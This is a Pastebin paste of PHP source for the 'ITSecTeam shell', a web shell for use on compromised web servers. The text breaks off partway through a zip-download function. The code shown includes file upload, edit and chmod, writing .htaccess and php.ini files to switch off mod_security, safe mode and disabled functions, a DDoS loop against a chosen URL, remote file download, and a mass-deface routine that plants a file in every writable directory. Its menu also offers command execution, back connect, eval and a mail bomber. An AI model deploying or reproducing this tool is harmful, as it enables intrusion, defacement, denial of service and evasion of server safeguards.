TP2K1

itsecteam shell

Jun 19th, 2015
485
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 64.85 KB | None | 0 0
  1. <?php
  2. session_start();
  3. set_time_limit(0);
  4. error_reporting(0);
  5. if (get_magic_quotes_gpc()) {
  6. function stripslashes_deep($value) {
  7. $value = is_array($value) ?
  8. array_map('stripslashes_deep', $value) :
  9. stripslashes($value);
  10.  
  11. return $value;
  12. }
  13. $_POST = array_map('stripslashes_deep', $_POST);
  14. $_GET = array_map('stripslashes_deep', $_GET);
  15. $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
  16. $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
  17. }
  18. if($_GET['do']=="remove"){
  19. unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
  20. }
  21. $basep=$_SERVER['DOCUMENT_ROOT'];
  22. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  23. $slash="\\";
  24. $basep=str_replace("/","\\",$basep);
  25. }else{
  26. $slash="/";
  27. $basep=str_replace("\\","/",$basep);
  28. }
  29. if($_GET['do']=="remove"){
  30. unlink(getcwd().$slash.$_SERVER["SCRIPT_NAME"]);
  31. }
  32. if ($_REQUEST['address']){
  33. if(is_readable($_REQUEST['address'])){
  34. chdir($_REQUEST['address']);}else{
  35. alert("Permission Denied !");}}
  36. $me=$_SERVER['PHP_SELF'];
  37. $formp="<form method=post action='".$me."'>";
  38. $formg="<form method=get action='".$me."'>";
  39. $nowaddress='<input type=hidden name=address value="'.getcwd().'">';
  40. if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
  41. if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){
  42. alert("File Upload Successful");
  43. }else{
  44. alert("Permission Denied !");
  45.  
  46. }
  47. }
  48. if(ini_get('disable_functions')){
  49. $disablef=ini_get('disable_functions');
  50. }else{
  51. $disablef="All Functions Enable";
  52. }
  53. if(ini_get('safe_mode')){
  54. $safe_modes="On";
  55. }else{
  56. $safe_modes="Off";
  57. }
  58. if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
  59. if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");}
  60. }
  61. $picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=';
  62. $picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC';
  63. $head='<style type="text/css">
  64. A:link {text-decoration: none}
  65. A:visited {text-decoration: none}
  66. A:active {text-decoration: none}
  67. A:hover {text-decoration: underline overline; color: 414141;}
  68. .focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
  69. </style><head>
  70. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  71. <title>iTSecTeam</title>
  72. </head><body topmargin="0" leftmargin="0" rightmargin="0"
  73. bgcolor="#f2f2f2"><div align="center">
  74. &nbsp;<table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
  75. <tr>
  76. <td height="30" width="996">
  77. <p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=home">Home</a> -- <a href="?do=filemanager&address='.getcwd().'">File Manager</a> -- <a href="?do=cmd&address='.getcwd().'">Command Execute</a> -- <a href="?do=bc&address='.getcwd().'">Back Connect</a> --
  78. <a href="?do=bypasscmd&address='.getcwd().'">BypasS Command eXecute(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
  79. <a href="?do=bypassdir&address='.getcwd().'">BypasS Directory</a> -- <a href="?do=eval&address='.getcwd().'">
  80. Eval Php</a> -- <a href="?do=db&address='.getcwd().'">Data Base</a> -- <a href="?do=convert&address='.getcwd().'">Convert</a> -- <a href="?do=mail&address='.getcwd().'">Mail Boomber</a><a href="?do=info&address='.getcwd().'">
  81. <br>Server Information</a> -- <a href="?do=d0slocal&address='.getcwd().'">Dos Local Server</a> -- <a href="?do=dump&address='.getcwd().'">Backup Database</a> -- <a href="?do=mass&address='.getcwd().'">Mass Deface</a> -- <a href="?do=dlfile&address='.getcwd().'">Download Remote File</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">Find Writable Directory</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
  82. </span></font></td></tr></table></div>
  83. <div align="center">
  84. <table id="table2" style="border-collapse: collapse; border-style:
  85. solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
  86. cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px;
  87. border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
  88. height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
  89. Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);"
  90. width="950" bgcolor="#e7e3de" height="10" valign="top">';
  91. $end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
  92. $deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
  93. function alert($text){
  94. echo "<script>alert('".$text."')</script>";
  95. }
  96. if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
  97. if(is_readable($_GET['address'].$_GET['filename'])){
  98. $opedit=fopen($_GET['address'].$_GET['filename'],"r");
  99. while(!feof($opedit))
  100. $data.=fread($opedit,9999);
  101. fclose($opedit);
  102. echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET['filename'].' name=namefe><br><input type=submit value=" Save "></form></p>'.$end;exit;
  103. }else{alert("Permission Denied !");}}
  104. function sizee($size)
  105. {
  106. if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  107. elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  108. elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  109. else {$size = $size . " B";}
  110. return $size;
  111. }
  112. if($_REQUEST['do']=='about'){
  113. echo $head."<p align='center'><b><font color=red>ITSecTeam, IT Security Research & Penetration Testing Team</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Coded By : Amin Shokohi(Pejvak)<br>Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )<br>Home Page : <a href='http://www.itsecteam.com'>http://www.itsecteam.com</a><br>Update Notice: <a href='http://itsecteam.com/en/tools/itsecteam_shell.htm'>ITSecTeam Shell</a><br>Forum : <a href='http://www.forum.itsecteam.com'>http://www.forum.itsecteam.com</a><br>
  114. <center>
  115. <PRE>
  116.  
  117. ______ ______ ____ ______
  118. /\__ _\/\__ _\/\ _`\ /\__ _\
  119. \/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___
  120. \ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\
  121. \_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \
  122. /\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
  123. \/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130. </PRE>
  131.  
  132.  
  133. ".$end;exit;
  134.  
  135. }
  136. function deleteDirectory($dir) {
  137. if (!file_exists($dir)) return true;
  138. if (!is_dir($dir) || is_link($dir)) return unlink($dir);
  139. foreach (scandir($dir) as $item) {
  140. if ($item == '.' || $item == '..') continue;
  141. if (!deleteDirectory($dir . "/" . $item)) {
  142. chmod($dir . "/" . $item, 0777);
  143. if (!deleteDirectory($dir . "/" . $item)) return false;
  144. };}return rmdir($dir);}
  145.  
  146. function download($fileadd,$finame){
  147. $dlfilea=$fileadd.$finame;
  148. header("Content-Disposition: attachment; filename=" . $finame);
  149. header("Content-Type: application/download");
  150. header("Content-Length: " . filesize($dlfilea));
  151. flush();
  152. $fp = fopen($$dlfilea, "r");
  153. while (!feof($fp))
  154. {
  155. echo fread($fp, 65536);
  156. flush();
  157. }
  158. fclose($fp);
  159. }
  160. if($_GET['do']=="rename"){
  161. echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value=" Save "></form></p>'.$end;exit;
  162. }
  163.  
  164. if ($_GET['byapache']=='ofms'){
  165. $fse=fopen(getcwd().$slash.".htaccess","w");
  166. fwrite($fse,'<IfModule mod_security.c>
  167. Sec------Engine Off
  168. Sec------ScanPOST Off
  169. </IfModule>');
  170. fclose($fse);
  171. }elseif ($_GET['byapache']=='bysap'){
  172. $fse=fopen(getcwd().$slash.".htaccess","w");
  173. fwrite($fse,'Options +FollowSymLinks
  174. DirectoryIndex Persian-Gulf-For-Ever.html');
  175. fclose($fse);
  176. }elseif ($_GET['byapache']=='sfadf'){
  177. $fse=fopen(getcwd().$slash."php.ini","w");
  178. fwrite($fse,'safe_mode=OFF
  179. disable_functions=NONE');
  180. fclose($fse);
  181. }
  182. if($_GET['do']=="apache"){
  183. echo $head.$formg.$nowaddress.'<p align="center">
  184. <select name=byapache>
  185. <option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
  186. <option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
  187. </select><br><input type=submit value=eXecute></form></p>'.$end;exit;
  188. }
  189. if($_GET['do']=="dd0s"){
  190. echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value=" DDoS "></form></p>'.$end;exit;
  191. }
  192.  
  193. if($_GET['urldd0'] && $_GET['timedd0']){
  194. for ($id=0;$$id<$_GET['timedd0'];$id++){
  195. $fp=null;
  196. $contents=null;
  197. $fp=fopen($_GET['urldd0'],"rb");
  198. while (!feof($fp)) {
  199. $contents .= fread($fp, 8192);
  200. }
  201. fclose($fp);
  202. }}
  203. if($_GET['do']=="dlfile"){
  204. echo $head.$formp.$nowaddress.'<p align="center">Download Remote File!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value=" Download "></form></p>'.$end;exit;
  205. }
  206. function dirpe($addres){
  207. global $slash;
  208. $idd=0;
  209. if ($dirhen = @opendir($addres)) {
  210. while ($file = readdir($dirhen)) {
  211. $permdir=str_replace('//','/',$addres.$slash.$file);
  212. if($file!='.' && $file!='..' && is_dir($permdir)){
  213. if (is_writable($permdir)) {
  214. $dirdata[$idd]['filename']=$permdir;
  215. $idd++;
  216. }
  217. dirpe($permdir);
  218. }
  219. }
  220. closedir($dirhen);
  221. } else {
  222. return ("notperm");
  223. }
  224. if ($dirdata){
  225. return $dirdata;
  226. }else{
  227. return "notfound";
  228.  
  229. }
  230. }
  231. function dirpmass($addres,$massname,$masssource){
  232. global $slash;
  233. $idd=0;
  234. if ($dirhen = @opendir($addres)) {
  235. while ($file = readdir($dirhen)) {
  236. $permdir=str_replace('//','/',$addres.$slash.$file);
  237. if($file!='.' && $file!='..' && is_dir($permdir)){
  238. if (is_writable($permdir)) {
  239. if ($fm=fopen($permdir.$slash.$massname,"w")){
  240. fwrite($fm,$masssource);
  241. fclose($fm);
  242. $dirdata[$idd]['filename']=$permdir;
  243. }
  244.  
  245. $idd++;
  246. }
  247. dirpmass($permdir);
  248. }
  249. }
  250. closedir($dirhen);
  251. } else {
  252. return ("notperm");
  253. }
  254. if ($dirdata){
  255. return $dirdata;
  256. }else{
  257. return "notfound";
  258.  
  259. }
  260. }
  261. if($_GET['do']=="perm"){
  262. echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value=" Search "></form></p>'.$end;exit;
  263. }
  264. if ($_POST['affw']){
  265. $arrfilelist=dirpe($_POST['affw']);
  266. if ($arrfilelist=='notfound'){
  267. alert("Not Found !");
  268. }elseif($arrfilelist=='notperm'){
  269. alert("Permission Denied !");
  270. }else{
  271. foreach ($arrfilelist as $tmpdir){
  272. if ($coi %2){
  273. $colort='"#e7e3de"';
  274. }else{
  275. $colort='"#e4e1de"';}
  276. $coi++;
  277. $permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  278. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
  279. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
  280. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
  281. }
  282. echo $head.'
  283. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  284. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  285. </tr></table>'.$permdir.'</table>
  286. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
  287. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  288. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
  289. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
  290. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  291. <font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
  292. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  293. <form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  294. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
  295. <input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
  296. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  297. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
  298. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  299. <font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
  300. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  301. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
  302. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  303. <font face="Tahoma" style="font-size: 10pt">
  304. <input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  305. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  306. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
  307. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  308. <font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  309. <td width="200" align="right" valign="top">
  310. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
  311. <td width="750"><font face="Tahoma" style="font-size: 10pt">
  312. <input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
  313. }}
  314. if($_GET['do']=="mass"){
  315. echo $head.$formp.'<p align="center">[Mass Deface]<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value=" Mass "></form></p>'.$end;exit;
  316. }
  317. if ($_POST['mffw']){
  318. $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']);
  319. if ($arrfilelist=='notfound'){
  320. alert("Not Found !");
  321. }elseif($arrfilelist=='notperm'){
  322. alert("Permission Denied !");
  323. }else{
  324. foreach ($arrfilelist as $tmpdir){
  325. if ($coi %2){
  326. $colort='"#e7e3de"';
  327. }else{
  328. $colort='"#e4e1de"';}
  329. $coi++;
  330. $permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  331. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
  332. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
  333. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
  334. }
  335. echo $head.'
  336. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  337. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  338. </tr></table>'.$permdir.'</table>
  339. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
  340. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  341. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
  342. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
  343. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  344. <font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
  345. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  346. <form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  347. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
  348. <input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
  349. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  350. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
  351. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  352. <font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
  353. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  354. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
  355. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  356. <font face="Tahoma" style="font-size: 10pt">
  357. <input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  358. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  359. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
  360. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  361. <font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  362. <td width="200" align="right" valign="top">
  363. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
  364. <td width="750"><font face="Tahoma" style="font-size: 10pt">
  365. <input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
  366. }}
  367. if($_POST['adlr'] && $_POST['adsr']){
  368. $url = $_POST['adlr'];
  369. $newfname = $_POST['adsr'] . basename($url);
  370. $file = fopen ($url, "rb");
  371. if ($file) {
  372. $newf = fopen ($newfname, "wb");
  373. if ($newf)
  374. while(!feof($file)) {
  375. fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
  376. }
  377. alert("File Downloaded Success");
  378. }else{alert("Can Not Open File");}
  379. if ($file) {
  380. fclose($file);
  381. }
  382. if ($newf) {
  383. fclose($newf);
  384. }
  385. }
  386. if($_GET['do']=="down" and $_GET['type']=='file'){
  387. download($_GET['address'],$_GET['filename']);}
  388. if($_GET['do']=="down" and $_GET['type']=='dir'){
  389. class zipfile
  390. {
  391. var $datasec = array();
  392. var $ctrl_dir = array();
  393. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  394. var $old_offset = 0;
  395. function add_dir($name)
  396. {
  397. $name = str_replace("\\", "/", $name);
  398. $fr = "\x50\x4b\x03\x04";
  399. $fr .= "\x0a\x00";
  400. $fr .= "\x00\x00";
  401. $fr .= "\x00\x00";
  402. $fr .= "\x00\x00\x00\x00";
  403. $fr .= pack("V",0);
  404. $fr .= pack("V",0);
  405. $fr .= pack("V",0);
  406. $fr .= pack("v", strlen($name) );
  407. $fr .= pack("v", 0 );
  408. $fr .= $name;
  409. $fr .= pack("V",$crc);
  410. $fr .= pack("V",$c_len);
  411. $fr .= pack("V",$unc_len);
  412. $this -> datasec[] = $fr;
  413. $new_offset = strlen(implode("", $this->datasec));
  414. $cdrec = "\x50\x4b\x01\x02";
  415. $cdrec .="\x00\x00";
  416. $cdrec .="\x0a\x00";
  417. $cdrec .="\x00\x00";
  418. $cdrec .="\x00\x00";
  419. $cdrec .="\x00\x00\x00\x00";
  420. $cdrec .= pack("V",0);
  421. $cdrec .= pack("V",0);
  422. $cdrec .= pack("V",0);
  423. $cdrec .= pack("v", strlen($name) );
  424. $cdrec .= pack("v", 0 );
  425. $cdrec .= pack("v", 0 );
  426. $cdrec .= pack("v", 0 );
  427. $cdrec .= pack("v", 0 );
  428. $ext = "\x00\x00\x10\x00";
  429. $ext = "\xff\xff\xff\xff";
  430. $cdrec .= pack("V", 16 );
  431. $cdrec .= pack("V", $this -> old_offset );
  432. $this -> old_offset = $new_offset;
  433. $cdrec .= $name;
  434. $this -> ctrl_dir[] = $cdrec;
  435. }
  436. function add_file($data, $name)
  437. {
  438. $name = str_replace("\\", "/", $name);
  439. $fr = "\x50\x4b\x03\x04";
  440. $fr .= "\x14\x00";
  441. $fr .= "\x00\x00";
  442. $fr .= "\x08\x00";
  443. $fr .= "\x00\x00\x00\x00";
  444. $unc_len = strlen($data);
  445. $crc = crc32($data);
  446. $zdata = gzcompress($data);
  447. $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
  448. $c_len = strlen($zdata);
  449. $fr .= pack("V",$crc);
  450. $fr .= pack("V",$c_len);
  451. $fr .= pack("V",$unc_len);
  452. $fr .= pack("v", strlen($name) );
  453. $fr .= pack("v", 0 );
  454. $fr .= $name;
  455. $fr .= $zdata;
  456. $fr .= pack("V",$crc);
  457. $fr .= pack("V",$c_len);
  458. $fr .= pack("V",$unc_len);
  459. $this -> datasec[] = $fr;
  460. $new_offset = strlen(implode("", $this->datasec));
  461. $cdrec = "\x50\x4b\x01\x02";
  462. $cdrec .="\x00\x00";
  463. $cdrec .="\x14\x00";
  464. $cdrec .="\x00\x00";
  465. $cdrec .="\x08\x00";
  466. $cdrec .="\x00\x00\x00\x00";
  467. $cdrec .= pack("V",$crc);
  468. $cdrec .= pack("V",$c_len);
  469. $cdrec .= pack("V",$unc_len);
  470. $cdrec .= pack("v", strlen($name) );
  471. $cdrec .= pack("v", 0 );
  472. $cdrec .= pack("v", 0 );
  473. $cdrec .= pack("v", 0 );
  474. $cdrec .= pack("v", 0 );
  475. $cdrec .= pack("V", 32 );
  476. $cdrec .= pack("V", $this -> old_offset );
  477. $this -> old_offset = $new_offset;
  478. $cdrec .= $name;
  479. $this -> ctrl_dir[] = $cdrec;
  480. }
  481. function file() {
  482. $data = implode("", $this -> datasec);
  483. $ctrldir = implode("", $this -> ctrl_dir);
  484. return
  485. $data.
  486. $ctrldir.
  487. $this -> eof_ctrl_dir.
  488. pack("v", sizeof($this -> ctrl_dir)).
  489. pack("v", sizeof($this -> ctrl_dir)).
  490. pack("V", strlen($ctrldir)).
  491. pack("V", strlen($data)).
  492. "\x00\x00";
  493. }
  494. }
  495. $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash;
  496. $zipfile = new zipfile();
  497. function get_files_from_folder($directory, $put_into) {
  498. global $zipfile;
  499. if ($handle = opendir($directory)) {
  500. while (false !== ($file = readdir($handle))) {
  501. if (is_file($directory.$file)) {
  502. $fileContents = file_get_contents($directory.$file);
